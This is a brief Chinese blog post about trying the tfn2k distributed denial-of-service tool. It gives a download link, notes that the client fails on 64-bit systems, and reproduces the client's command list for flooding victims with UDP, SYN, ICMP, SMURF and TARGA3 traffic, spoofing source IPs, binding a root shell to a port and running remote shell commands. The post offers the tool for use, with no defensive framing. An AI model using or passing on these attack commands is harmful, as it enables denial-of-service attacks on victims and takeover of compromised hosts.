小试tfn2k
工具下载
http://cid-48e23e4eb6cd2943.skydrive.live.com/self.aspx/xxx/tfn2k.tar.gz
我在32位系统中测试时表现良好,在64位中虽然编译通过但是无法调用client ,具体原因我也搞不明白,不知道有没有人研究过。
控制攻击
<-c command ID> 0 – Halt all current floods on server(s) immediately
1 – Change IP antispoof-level (evade rfc2267 filtering)
usage: -i 0 (fully spoofed) to -i 3 (/24 host bytes spoofed)
2 – Change Packet size, usage: -i
3 – Bind root shell to a port, usage: -i
4 – UDP flood, usage: -i victim@victim2@victim3@…
5 – TCP/SYN flood, usage: -i victim@… [-p destination port]
6 – ICMP/PING flood, usage: -i victim@…
7 – ICMP/SMURF flood, usage: -i victim@broadcast@broadcast2@…
8 – MIX flood (UDP/TCP/ICMP interchanged), usage: -i victim@…
9 – TARGA3 flood (IP stack penetration), usage: -i victim@…
10 – Blindly execute remote shell command, usage -i command
网上的几篇同类文章
http://publish.it168.com/2007/0703/20070703119401.shtml
http://www.webjx.com/htmldata/2007-10-08/1191832082.html
http://hi.baidu.com/msrighthomepage/blog/item/1623032d22476ee58b1399f0.html